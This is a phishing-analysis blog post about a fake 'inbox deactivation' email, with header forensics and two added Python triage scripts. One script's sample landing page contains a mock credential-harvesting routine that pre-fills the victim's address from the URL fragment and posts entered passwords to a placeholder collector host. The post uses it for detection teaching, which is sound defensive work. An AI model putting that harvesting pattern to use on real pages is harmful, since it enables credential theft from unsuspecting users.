Phishing Catch of the Day: Your Inbox Will be Deactivated

Read the full article at https://blog.knowbe4.com/phishing-catch-of-the-day-your-inbox-will-be-deactivated

In this series, our security experts will give a behind-the-scenes look at phishing emails that were reported to PhishER, KnowBe4’s Security Orchestration, Automation and Response (SOAR) platform. We will go in-depth to show you real-world attacks and how you can forensically examine phishing emails quickly.

Each Phishing Catch of the Day will focus on a single phish attempt and describe:

  • What context or pretexting exists between employee, hacker and email.
  • What red flags one can look for before falling victim.
  • What attack vector is being utilized and for what purpose.
  • What steps to take to inoculate users from similar attacks.

The Initial Phish Breakdown

Figure 1: PhishER Screenshot of Reported Phishing Email

Early in the morning on Feb 11th, a KnowBe4 employee received an email claiming that their inbox would be deactivated if they did not confirm their email address. The sender of this phish is hoping to generate an emotional reaction, causing the user to react without thinking.

Phishing Warning Signs and Red Flags

The best approach to consistently identify phishing is to simply ask oneself “Is this phishing?” whenever viewing an email or electronic message. The brain will naturally shift into a detective mindset and become resilient to emotional reaction.

Scroll up to the first screenshot, put on your detective cap, and try to find as many red flags as you can before continuing!

Figure 2: Red flags found in the phishing email

Let’s gather more information from the headers of the email. Clicking on the Headers tab in PhishER will give you all headers pulled from the reported message in an easy-to-read format and highlights IP addresses and authentication information for you. Take a look at the ARC-Authentication-Results header to find the original, non-spoofable sender location.

Figure 3: ARC-Authentication-Results from the Headers tab in PhishER

It appears that the email is coming from an Amazon SES server and the originating IP is 23.251.242.1. You may be able to reach out to Amazon and report abuse if necessary, especially if this is an ongoing problem from this specific address.
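The header check described above can be scripted for triage. The Python below is an added example, not PhishER's code or anything from the post: it unfolds the ARC-Authentication-Results, Authentication-Results and Received-SPF headers of a reported message, pulls out the SPF/DKIM/DMARC verdicts, the envelope sender and the connecting IP, and lists the alignment mismatches an analyst would flag before touching the link. The message is constructed; the relay IP 23.251.242.1 and the amazonses.com sending domain are the values the post cites, and every other host and address is a placeholder.

```python
import email
import email.message
import re
from email.utils import parseaddr

# Constructed sample of a reported message (not the email from the post). The
# relay IP 23.251.242.1 and the amazonses.com sending domain are the values the
# post cites; every other address and host is a placeholder.
SAMPLE_RAW = """\
ARC-Authentication-Results: i=1; mx.example.net;
 dkim=pass header.i=@amazonses.com header.s=sample header.b=ABCDEF;
 spf=pass (mx.example.net: domain of bounce@amazonses.com designates
 23.251.242.1 as permitted sender) smtp.mailfrom=bounce@amazonses.com;
 dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=example.com
Received-SPF: pass (mx.example.net: domain of bounce@amazonses.com designates
 23.251.242.1 as permitted sender) client-ip=23.251.242.1;
From: "IT Helpdesk" <helpdesk@example.com>
To: employee@example.net
Subject: Your Inbox Will be Deactivated

Confirm your email address within 24 hours or your inbox will be deactivated.
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# Fields to pull from an unfolded header value -> regex with one capture group.
FIELD_PATTERNS = {
    "spf": r"\bspf=(\w+)",
    "dkim": r"\bdkim=(\w+)",
    "dmarc": r"\bdmarc=(\w+)",
    "client_ip": r"(?:client-ip|smtp\.remote-ip)=" + IPV4,
    "mailfrom": r"smtp\.mailfrom=([^\s;]+)",
    "dkim_domain": r"header\.[di]=@?([^\s;]+)",
    "header_from_domain": r"header\.from=([^\s;]+)",
}


def _unfold(value: str) -> str:
    """Join RFC 5322 folded continuation lines into a single line."""
    return re.sub(r"\r?\n[ \t]+", " ", value).strip()


def _domain(addr: str) -> str:
    """Lower-cased domain part of an address (the bare value if there is no '@')."""
    return addr.rpartition("@")[2].lower()


def parse_auth_results(msg: email.message.Message) -> dict:
    """Pull verdicts and sender evidence from (ARC-)Authentication-Results and
    Received-SPF. The first value seen per field wins, i.e. the verdict stamped
    by our own receiving system (ARC instance i=1 on a direct delivery)."""
    info = {"authserv_id": None, **{k: None for k in FIELD_PATTERNS}}
    for name in ("ARC-Authentication-Results", "Authentication-Results",
                 "Received-SPF"):
        for raw in msg.get_all(name, []):
            value = _unfold(raw)
            # optional ARC instance tag, then the authserv-id that ran the checks
            m = re.match(r"(?:i=\d+;\s*)?([\w.-]+);", value)
            if m and info["authserv_id"] is None:
                info["authserv_id"] = m.group(1)
            for key, pattern in FIELD_PATTERNS.items():
                m = re.search(pattern, value)
                if m and info[key] is None:
                    info[key] = m.group(1)
            # Some receivers only name the connecting IP inside the SPF comment.
            if info["client_ip"] is None:
                m = re.search(r"designates " + IPV4 + r" as permitted sender", value)
                if m:
                    info["client_ip"] = m.group(1)
    return info


def triage(raw_message: str) -> dict:
    """Header-level triage: the checks an analyst makes from the Headers tab
    before ever opening the link. Returns the evidence plus a list of flags."""
    msg = email.message_from_string(raw_message)
    info = parse_auth_results(msg)
    visible_from = _domain(parseaddr(msg.get("From", ""))[1])
    flags = []
    if info["dmarc"] and info["dmarc"] != "pass":
        flags.append(f"DMARC {info['dmarc']} for header.from={info['header_from_domain']}")
    if info["mailfrom"] and _domain(info["mailfrom"]) != visible_from:
        flags.append(f"envelope sender {info['mailfrom']} is not the From domain {visible_from}")
    if info["dkim_domain"] and info["dkim_domain"].lower() != visible_from:
        flags.append(f"DKIM signature is from {info['dkim_domain']}, not {visible_from}")
    return {"evidence": info, "from_domain": visible_from, "flags": flags}


if __name__ == "__main__":
    result = triage(SAMPLE_RAW)
    ev = result["evidence"]
    print(f"relay {ev['client_ip']} via {ev['authserv_id']}: "
          f"spf={ev['spf']} dkim={ev['dkim']} dmarc={ev['dmarc']}")
    for flag in result["flags"]:
        print("-", flag)
```

Note that SPF and DKIM both pass here, exactly as they would for a real Amazon SES customer: the verdicts are about the sending service, not the name in the From line. The useful signal is the alignment: the envelope sender and the DKIM signing domain belong to the sending provider while the From header claims the victim's own domain, which is why DMARC fails and why the relay IP, not the From address, is what you report to the provider.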

Phishing Attack Vector and Road to Compromise

Opening the link found in the email, we see the landing page below.

Figure 4: Phishing email landing page

Notice the “NOPE” at the top and the prefilled “nope@nope.com”. Both are pulled from the ‘#’ anchor (the URL fragment) passed to the page from the URL in the email. The page then uses JavaScript to style the form and add any icon found in Google Images for the user’s email domain. This provides some familiarity to a victim and imitates a generic login page that an individual might trust.

Figure 5: Anchor passed in from the URL in the email body

Upon entering their credentials, the page runs a JavaScript routine to verify that the password and email fields are not empty, then sends the form contents to a remote server in Indonesia (which may explain why the email was sent outside US business hours).

Figure 6: JS code to POST user-entered credentials to a remote server

Figure 7: WHOIS of the domain found in the POST request
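Figures 5 and 6 describe two behaviours of the landing page: the target's email address arrives in the URL fragment and is read client-side, and the form contents are posted to a third-party host. The Python below is an added example, not code from the post or from the kit: given a reported URL and the fetched page source, it reports both indicators and lists every off-site host the page can post form data to. The URL, the page source and the collector host kit-collector.invalid are constructed placeholders; the fragment nope@nope.com is the value shown in the post.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed inputs (not captured from the real kit). The fragment value is
# the one shown in the post; the hosts are placeholders under .invalid.
SAMPLE_URL = "https://login-verify.invalid/verify/index.html#nope@nope.com"
SAMPLE_PAGE = """<html><body>
<h2 id="who"></h2>
<form id="login">
  <input id="email"><input id="pass" type="password"><button>Sign in</button>
</form>
<script>
  // kit reads the victim address from the URL fragment and pre-fills the form
  var who = location.hash.substring(1);
  document.getElementById('email').value = who;
  document.getElementById('who').textContent = who.split('@')[0].toUpperCase();
  $('#login').submit(function (e) {
    e.preventDefault();
    if (!$('#email').val() || !$('#pass').val()) return;
    $.ajax({type: 'POST', url: 'https://kit-collector.invalid/next.php',
            data: $(this).serialize()});
  });
</script></body></html>"""

EMAIL_RE = re.compile(r"^[\w.+-]+@[\w-]+(?:\.[\w-]+)+$")
QUOTED = r"""["']([^"']+)["']"""  # a single- or double-quoted string literal
# Ways a page can name where form data goes: form action, XHR open(),
# fetch(), jQuery $.post() and the url: option of $.ajax().
POST_TARGET_RES = [
    re.compile(r"<form[^>]*\baction\s*=\s*" + QUOTED, re.I),
    re.compile(r"\.open\s*\(\s*['\"]POST['\"]\s*,\s*" + QUOTED, re.I),
    re.compile(r"\bfetch\s*\(\s*" + QUOTED, re.I),
    re.compile(r"\$\.post\s*\(\s*" + QUOTED, re.I),
    re.compile(r"\burl\s*:\s*" + QUOTED, re.I),
]


def analyse_landing(url: str, page_source: str) -> dict:
    """Report fragment pre-fill and off-site POST targets for a landing page."""
    parts = urlsplit(url)
    landing_host = (parts.hostname or "").lower()
    fragment = unquote(parts.fragment)  # kits sometimes percent-encode the '@'
    findings = []
    if EMAIL_RE.match(fragment):
        findings.append(f"URL fragment carries a target address: {fragment}")
    if re.search(r"\blocation\.hash\b", page_source):
        findings.append("page script reads location.hash (client-side pre-fill)")
    post_targets = set()
    for rx in POST_TARGET_RES:
        post_targets.update(m.group(1) for m in rx.finditer(page_source))
    external_hosts = set()
    for target in post_targets:
        host = (urlsplit(target).hostname or "").lower()
        # relative actions (no host) go back to the landing host itself
        if host and host != landing_host:
            external_hosts.add(host)
            findings.append(f"form data is posted off-site to {host} ({target})")
    return {
        "fragment": fragment,
        "post_targets": sorted(post_targets),
        "external_post_hosts": sorted(external_hosts),
        "findings": findings,
    }


if __name__ == "__main__":
    for line in analyse_landing(SAMPLE_URL, SAMPLE_PAGE)["findings"]:
        print("-", line)
```

One consequence worth knowing for incident response: a browser never sends the fragment to the server, so proxy and web-server logs of the landing page request will not show which address was targeted. The address has to be recovered from the reported email's URL (as PhishER shows it in Figure 5), which is also why the kit reads it client-side. The collector host found in the page source is the one whose WHOIS record is examined in Figure 7.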

Conclusions and Recommendations

The attack described above is a perfect example of credential phishing. This is a tactic where a hacker routes you to a landing page that imitates a popular or important web application in the hope that, when you enter your username and password, they can pocket the credentials to use at a later date.

This attack can be particularly harmful to your organization
